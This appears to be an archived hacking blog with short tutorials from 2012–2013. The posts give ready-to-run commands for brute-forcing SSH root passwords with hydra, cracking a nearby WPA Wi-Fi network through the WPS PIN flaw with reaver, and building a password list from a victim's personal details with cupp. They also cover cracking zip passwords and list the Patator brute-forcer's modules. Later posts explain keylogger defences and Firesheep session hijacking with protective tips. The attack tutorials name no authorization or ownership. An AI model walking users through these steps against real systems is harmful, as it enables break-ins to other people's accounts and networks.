Thursday, April 4, 2013

How to SSH Cracking

We are going to use hydra to crack ssh.

  • Check if ssh port is open (default 22)
nmap -sT -Pn -n -p22 192.168.1.5
  • Try to connect
ssh 192.168.1.5
  • Cracking
hydra -l root -P mypasslist.lst 192.168.1.5 ssh
  • If step 3 ended succesfully, try to connect again

Monday, April 1, 2013

How to crack wi-fi with reaver

What you'll need?:

  • Backtrack 5
  • Computer with wi-fi and a DVD drive
  • A nearby WPA-secured wi-fi network
  • A little patience

Let's get crackin'

At this point you should have BackTrack burned to a DVD, and you should have your laptop handy.
  • Step 1: Boot into BackTrack
To boot into BackTrack, just put the DVD in your drive and boot your machine from the disc. (Google around if you don't know anything about live CDs/DVDs and need help with this part.) During the boot process, BackTrack will prompt you to to choose the boot mode. Select "BackTrack Text - Default Boot Text Mode" and press Enter.

Eventually BackTrack will boot to a command line prompt. When you've reached the prompt, type startx and press Enter. BackTrack will boot into its graphical interface.
  • Step 2:Install reaver
Reaver has been added to the bleeding edge version of BackTrack, but it's not yet incorporated with the live DVD, so as of this writing, you need to install Reaver before proceeding. (Eventually, Reaver will simply be incorporated with BackTrack by default.) To install Reaver, you'll first need to connect to a Wi-Fi network that you have the password to.
  1. Click Applications > Internet > Wicd Network Manager
  2. Select your network and click Connect, enter your password if necessary, click OK, and then click Connect a second time.
Now that you're online, let's install Reaver. Click the Terminal button in the menu bar (or click Applications > Accessories > Terminal). At the prompt, type:
apt-get update 

And then, after the update completes:

apt-get install reaver
If all went well, Reaver should now be installed. It may seem a little lame that you need to connect to a network to do this, but it will remain installed until you reboot your computer. At this point, go ahead and disconnect from the network by opening Wicd Network Manager again and clicking Disconnect. (You may not strictly need to do this. I did just because it felt like I was somehow cheating if I were already connected to a network.)

  • Step 3: Gather Your Device Information, Prep Your Crackin'
 In order to use Reaver, you need to get your wireless card's interface name, the BSSID of the router you're attempting to crack (the BSSID is a unique series of letters and numbers that identifies a router), and you need to make sure your wireless card is in monitor mode. So let's do all that.
Find your wireless card: Inside Terminal, type:

iwconfig

Press Enter. You should see a wireless device in the subsequent list. Most likely, it'll be named wlan0, but if you have more than one wireless card, or a more unusual networking setup, it may be named something different.
Put your wireless card into monitor mode: Assuming your wireless card's interface name is wlan0, execute the following command to put your wireless card into monitor mode:
 airmon-ng start wlan0 
This command will output the name of monitor mode interface, which you'll also want to make note of. Most likely, it'll be mon0, like in the screenshot below. Make note of that.

Find the BSSID of the router you want to crack: Lastly, you need to get the unique identifier of the router you're attempting to crack so that you can point Reaver in the right direction. To do this, execute the following command:

airodump-ng wlan0 

You'll see a list of the wireless networks in range
When you see the network you want, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (it's the series of letters, numbers, and colons on the far left). The network should have WPA or WPA2 listed under the ENC column.
Now, with the BSSID and monitor interface name in hand, you've got everything you need to start up Reaver.

  • Step 4: Crack a Network's WPA Password with Reaver

Now execute the following command in the Terminal, replacing bssid and moninterface with the BSSID and monitor interface and you copied down above:

reaver -i moninterface -b bssid -vv 

For example, if your monitor interface was mon0 like mine, and your BSSID was 8D:AE:9D:65:1F:B2 (a BSSID I just made up), your command would look like:

reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv 

Press Enter, sit back, and let Reaver work its disturbing magic. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my successful test, Reaver took 2 hours and 30 minutes to crack the network and deliver me with the correct password. As mentioned above, the Reaver documentation says it can take between 4 and 10 hours, so it could take more or less time than I experienced, depending.

How Reaver Works

Now that you've seen how to use Reaver, let's take a quick overview of how Reaver works. The tool takes advantage of a vulnerability in something called Wi-Fi Protected Setup, or WPS. It's a feature that exists on many routers, intended to provide an easy setup process, and it's tied to a PIN that's hard-coded into the device. Reaver exploits a flaw in these PINs; the result is that, with enough time, it can reveal your WPA or WPA2 password.

Monday, March 11, 2013

How to make a wordlist in Backtrack 5 R3


Level : Easy

  Go to Applications - Backtrack - Privilege escalation - Password Attacks - Offline Attacks - Cupp

For example I make a list with my informations:
./cupp.py -i

  • Name : Alex
  • Surname : Claudiu
  • Nickname : Equinox
  • Birthdate(DDMMYYYY) : 06091997
  • Wife's (husband's) name : I don't have but i put a random name Adrianne
  • Wife's (husband's) nickname : Adrianne12
  • Wife's (husband's) birthdate (DDMMYYYY) : 12061995
  • Child's name : Abigail
  • Child's nickname : Abigail13
  • Child's birthdate (DDMMYYYY) : 05082000
  • Pet's name : Lessie
  • Company name : Backtrack
  • You can add some keywords about the victim just press Y/N and hit enter
  • You can add some random numbers just press Y/N and hit enter 
  • You can activate l33t mode just press Y/N and hit enter
Now to access your wordlist just open /pentest/passwords/wordlists
Good luck!

Monday, November 12, 2012

How To Protect Your Computer From Keyloggers

How To Protect Your Computer From Keyloggers

A keylogger is a small program that stores each keystroke a user types on a specific computer's keyboard. It is capable to send log files by email or via FTP.
Now the question is how to protect your computer system to get affected by keyloggers, keep in mind the sender of the file force you to click on it. So be careful while receiving a file from unknown person or even a known person.
You can get affected by vising untrustworthy web site. Some sites may have code in them that exploit your web browser and cause it to quietly install a keylogging application without your permission. (Note: even turstworthy sites can be hacked! The same hackers who are after your information can hack what you think of as trustworthy sites and add exploit code to them which could give you a keylogger.)

Here is the major steps to fight against keylogger:

  • Use a good AntiVirus
  • Keep your operating system up-to-date.
  • Install firewall software that prevents any unauthorized access between your computer and the Internet. Comodo is recommended. Again, its free and well regarded. 
  • Get a virus scanner. Grisoft provides one for free. Be sure to configure it to scan your system regularly and to check for updates. 
  • Get a free anti-spyware program and run it. Spy Sweeper is a good one. As with your anti-virus software, be sure to configure it to scan your system regularly and check for updates. 
  • Be sure to run the latest version of your browser software 
  • Be careful downloading files! While your anti-virus and anti-spyware software should catch anything that gets installed, it's better to catch them before they get installed and have a chance to cause damage. Never download files from sites you don't trust and be wary of opening unexpected e-mail attachments. 
  • Use Antilogger like Zemana 

Patator – Multi Purpose Brute Forcing Tool

Patator – Multi Purpose Brute Forcing Tool

There are many tools available for cracking like, ncrack, brutus and THE hydra but today I want to share patator. Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.




Currently it supports the following modules: 
* ftp_login : Brute-force FTP 
* ssh_login : Brute-force SSH 
* telnet_login : Brute-force Telnet 
* smtp_login : Brute-force SMTP 
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command 
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command 
* http_fuzz : Brute-force HTTP/HTTPS 
* pop_passd : Brute-force poppassd (not POP3) 
* ldap_login : Brute-force LDAP 
* smb_login : Brute-force SMB 
* mssql_login : Brute-force MSSQL 
* oracle_login : Brute-force Oracle 
* mysql_login : Brute-force MySQL 
* pgsql_login : Brute-force PostgreSQL 
* vnc_login : Brute-force VNC 
* dns_forward : Forward lookup subdomains 
* dns_reverse : Reverse lookup subnets 
* snmp_login : Brute-force SNMPv1/2 and SNMPv3 
* unzip_pass : Brute-force the password of encrypted ZIP files 
* keystore_pass : Brute-force the password of Java keystore files 
Download from HERE


FTP : Enumerate valid logins on a too verbose server 
HTTP : Brute-force phpMyAdmin logon  
SNMPv3 : Find valid usernames 
SNMPv3 : Find valid passwords 
DNS : Forward lookup  
DNS : Reverse lookup two netblocks owned by Google 
ZIP : Crack a password-protected ZIP file (older pkzip encryption not supported in JtR) 

Sunday, November 11, 2012

How to Crack Password-Protected Zip Files

How to Crack Password-Protected Zip Files

People using Zip to compress their files beside compression they are trying to lock their important data with password(s).
Now let suppose if you do this same thing with your important files and now you have forgotten password, now what to do now its time to crack it.
This article will teach you how to crack the password of Zip files.
For this purpose we will use Linux based operating system and a tool FCrackZip for this purpose, FCrackZip is a fast and free-ware tool and it is easy to use Zip cracker tool it is similar to fzc and zipcrack. It has been written in assembler and it uses brute force and dictionary based attack to crack or find-out the passwords.
By using a simple Linux terminal and command you can easily crack the Zip password, you can download FCrackZip from your software manager.

Use this command to get FCrackZip from terminal:
  • $ sudo apt-get install fcrackzip
After installing this you have options to attack on your zip file, either choose brute force attack or dictionary attack

Here is the simple usage example.
  • $ fcrackzip -v -b -p aaaaaa -u your_zip_file.zip
By looking you can easily see the brute force attack against a zip file that is password protected, it took around 30 minutes to find the password for this zip.

WiFi Killer-FireSheep


WiFi Killer-FireSheep

Security researcher always warned people about the bug and vulnerability of public networks and unencrypted services, life changes every day the new day come with some new vulnerability.

As you know that when you logging into a website your enter your user-name and password and then the server check your submitting user-name and password with their record and than assign you a cookies for your browser to get connected with server, what happen when you are logging and someone will get your cookies and use it on his browser, yes this is called session hijacking.

Over a year ago, session hijacking need some technical knowledge and the new and inexperienced user's cant do this, but the time has been changed and a Firefox add-on called Firesheep introduced that hijack the facebook,myspace and twitter session over an open network. FireSheep is free, open source and available almost on every operating system.

How FireSheep works


Firesheep is a packet sniffer that analyze received packets from unencrypted websites on a open network like WiFi connections.
An attacker install firesheep and the new side bar appears on Firefox and the extension wait for the 26 websites that are in firesheep database to log in, when someone log in in any of these websites than firesheep capture his session id or user-name and password. 
If you know the difference between HTTP and HTTPS than you can easily understand the working of FireSheep, yes when your browser shows HTTPS instead of HTTP means your are logging on an encrypted website.

Protection


  • Use a VPN(Virtual Private Network) that create a secure tunnel for your data.
  • Use HTTPS everywhere, it is a firefox add-on.
  • Avoid visiting such websites, when you connected to the public access networks, in place like coffee shops and airports.